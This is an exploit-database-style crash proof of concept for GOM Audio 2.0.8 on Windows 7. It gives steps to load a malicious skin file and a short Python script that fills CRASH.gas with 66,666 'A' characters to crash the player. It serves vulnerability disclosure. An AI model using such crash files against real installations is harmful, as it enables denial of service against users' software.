22 lines
No EOL
797 B
Text
22 lines
No EOL
797 B
Text
********************************************************************************************
|
||
# Exploit Title: GOM Audio 2.0.8 Crash POC
|
||
# Date: 8/24/2015
|
||
# Exploit Author: Un_N0n
|
||
# Software Vendor : http://audio.gomlab.com/
|
||
# Software Link: http://audio.gomlab.com/download_log.gom
|
||
# Version: 2.0.8 (2015/06/17)
|
||
# Tested on: Windows 7 x86(32 BIT)
|
||
********************************************************************************************
|
||
|
||
[Steps to Produce the Crash]:
|
||
1- open 'Goma.exe'.
|
||
2- Goto Preference -> Manage -> Skins.
|
||
3- Click on ADD, Browse CRASH.gas in it.
|
||
~ Software will Crash.
|
||
|
||
[Code to produce crash.txt]:
|
||
junk = "A"*66666
|
||
file = open("CRASH.gas",'w')
|
||
file.write(junk)
|
||
file.close()
|
||
********************************************************************************************** |